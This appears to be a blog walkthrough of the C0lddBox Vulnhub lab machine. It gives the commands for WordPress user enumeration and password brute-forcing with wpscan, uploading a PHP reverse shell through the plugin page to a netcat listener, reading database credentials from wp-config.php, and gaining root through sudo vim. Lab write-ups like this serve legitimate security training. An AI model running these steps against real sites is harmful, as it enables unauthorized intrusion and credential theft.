CTF Walkthrough

C0lddBox: Easy Vulnhub Walkthrough

C0lddBox: Easy Vulnhub Walkthrough

Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will solve the C0lddBox vulnhub machine, this machine Is the EASY level.

Let’s start with it, after you have made the setup of the ColdBox machine in a virtual box, start the machine.

Scan the whole network to know the IP address of the machine, so the command is;

sudo nmap -sn 192.168.0.1/24

You will find out the IP address of the machine like my machine IP address is “192.168.0.123“, now we need to scan the host for checking the open ports and some other details.

We found that only one port is open in the machine, which is “80-HTTP” we can access the IP address through a web browser.

This is a page of the c0lddbox machine, now we need to explore this page.

We found the log in page and that login page is of WordPress…, that says the website is built on wordpress.

Now after seeing this page I quickly use the tool “WPSCAN” to enumerate users.

-e = enumerate
 u = users

we found 4 users but one of the user is not valid, so we will continue with 3 users…

“the cold in person” this username is not valid, then after left out this we will have c0ldd, Philip, Hugo.

Now create a user name file and keep all the usernames there and now we need to brute-force the login panel so for passwords we will use “rockyou.txt”.

wpscan --url http://192.168.0.123 -U user.txt -P /Documents/rockyou.txt
-U = Username file location
-P = Password file location

After some seconds of brute-force attack, it gave me the password of the c0ldd user.

user=c0ldd & password=9876543210

Now login in with these credentials and we will get into the dashboard of WordPress.

NOw we need to search for things where we can upload the reverse shell to get the connection and we found the plugins corner.

Plugin >> Add new

NOw we should click on add new and we will get options for Upload

We got this, Now we need to search for a web shell Kali Linux by default has web shell in PHP we will upload that.

ls /usr/share/webshells/php

We need to edit this file before uploading, give the IP address of your base machine where we need to get the connection.

Change this IP address & after that just upload it.

we are done with uploading the file and now we need to call the php-reverse-shell.php to approach the shell.

so we need to start the Netcat listener on the given port.

nc -nvlp 1234

I got the shell and now we need an interactive shell because the shell, I got looks messy because we can’t see the directories changing.

python3 -c 'import pty;pty.spawn("/bin/bash")'

As we know the website is built on WordPress, so WordPress always handles a file wp-config.php which contains a Database username & password and the file is kept in an HTML folder.

cd /var/www/html 
cat wp-config.php

Now we should open the file using CAT command.

Here we got the password for Database user C0ldd, now we can switch the user using the “su” command

su c0ldd

We have changed the user and have escalated your privileges from www-data to c0ldd, easily we can fetch for user.txt which is your first flag.

convert base64 decode >> spanish to english

After trying several techniques of privilege escalation I found I technique to be useful we will check what all things have sudo permission.

sudo -l

That great!! vim has sudo permission we can simply run vim and easily take root access.

sudo /usr/bin/vim
:sh

Once we are done we can easily fetch the root.txt in the root directory.

convert base64 decode >> Spanish to English

Boom!! we have solved the machine.

To watch the video of c0lddBox CTF Link is given below;

It’s time to say GOODBYE for now…

Happy hacking!!

Share this post

About the author

Leave a Reply

Your email address will not be published. Required fields are marked *